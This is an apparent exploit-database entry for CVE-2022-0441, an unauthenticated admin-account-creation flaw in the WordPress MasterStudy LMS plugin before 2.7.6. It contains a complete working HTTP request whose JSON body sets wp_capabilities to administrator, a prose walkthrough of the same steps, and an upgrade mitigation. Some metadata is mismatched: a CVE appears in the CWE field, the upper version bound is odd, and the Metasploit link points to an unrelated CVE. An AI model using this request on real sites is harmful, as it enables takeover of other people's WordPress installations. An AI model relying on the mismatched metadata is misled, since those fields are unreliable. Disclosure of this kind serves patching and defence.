WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation

vendor:

MasterStudy LMS Learning Management System

by:

Numan Türle

9.8

CVSS

CRITICAL

Unauthenticated Admin Account Creation

798

CWE

Product Name: MasterStudy LMS Learning Management System

Affected Version From: <2.7.6

Affected Version To: 2.7.2005

Patch Exists: YES

Related CWE: CVE-2022-0441

CPE: a:wordpress:masterstudy_lms_learning_management_system

Metasploit: https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-45417/

Other Scripts:

Tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed, https://wordpress.org/plugins/masterstudy-lms-learning-management-system/, https://plugins.trac.wordpress.org/changeset/2667195, https://nvd.nist.gov/vuln/detail/CVE-2022-0441

Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'wordpress', 'vendor': 'stylemixthemes', 'product': 'masterstudy_lms'}

Platforms Tested:

2022

WordPress Plugin MasterStudy LMS 2.7.5 – Unauthenticated Admin Account Creation

WordPress Plugin MasterStudy LMS version 2.7.5 is vulnerable to unauthenticated admin account creation. An attacker can send a POST request to the /wp-admin/admin-ajax.php endpoint with the action parameter set to stm_lms_register and the nonce parameter set to a valid nonce. The request body should contain a JSON object with the user_login, user_email, user_password, user_password_re, become_instructor, privacy_policy, degree, expertize, auditory, additional, additional_instructors, and profile_default_fields_for_register parameters. The profile_default_fields_for_register parameter should contain a wp_capabilities object with the value set to {administrator: 1}. This will create an admin account with the specified username and password.

Mitigation:

Upgrade to version 2.7.6 or later of the WordPress Plugin MasterStudy LMS.

Source

Exploit-DB raw data:

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed


POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}